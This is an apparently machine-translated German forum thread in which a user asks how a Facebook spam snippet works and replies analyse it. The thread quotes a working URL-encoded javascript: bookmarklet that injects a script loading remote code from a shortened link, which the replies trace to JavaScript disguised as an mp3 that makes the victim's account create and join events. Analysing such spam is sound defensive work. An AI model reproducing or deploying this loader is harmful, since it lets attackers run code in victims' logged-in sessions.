Erklärung von Facebook-spam-code
So, ich habe gerade gesehen, diese spam-code auf Facebook, geschrieben in JavaScript und ich fragte mich, ob jemand könnte mir erklären, wie der code funktioniert, und interagiert mit Facebook. Ich habe nicht vor, verwenden Sie diese für bösartige Zwecke, aber ich bin einfach daran interessiert, die Sicherheit von Webseiten wie Facebook. Hier ist der code, der ausgeführt wird, aus der Adressleiste (ich schlage vor, nicht zu versuchen es selbst, können Sie am Ende mit ein paar Freunde genervt).
javascript: (a%3D(b%3Ddocument).createElement('script')).src%3D'http%3A%2F%2Fbit.ly%2FFB1337%20%20%3F'%2BM ath.random()%2Cb.body.appendChild(a)%3Bvoid(0)
- Es injiziert ein script-tag in das DOM whos Quelle geholt wird, von einer anderen web-site.
Du musst angemeldet sein, um einen Kommentar abzugeben.
Überprüfen Sie es hier, der link ist url-kodiert.:
http://meyerweb.com/eric/tools/dencoder/
javascript:
Was ich sehe: laden Sie diese url ein Skript und fügen Sie es auf der aktuellen Seite.
Edit:
Das script geladen wird, platziert Sie unter der url: http://www.raxarstudios.com/x/audiotrack2.mp3
Es ist maskerierten als ein mp3-song, aber es ist nur javascript: http://pastebin.com/RVmNVtt9
Ich habe schnell musterte es, es offenbar nutzt einige schwere ajax, um Ereignisse hinzufügen und beitreten Sie sich zu ihm.
+
auf den bitly-link erhalten Sie eine Seite mit Statistiken, die zeigen, wie viele Leute geladen, der link (etwa 4.000), die bit.ly Benutzername des Urhebers (draze
) und wo geht der link (mp3-Audiotrack)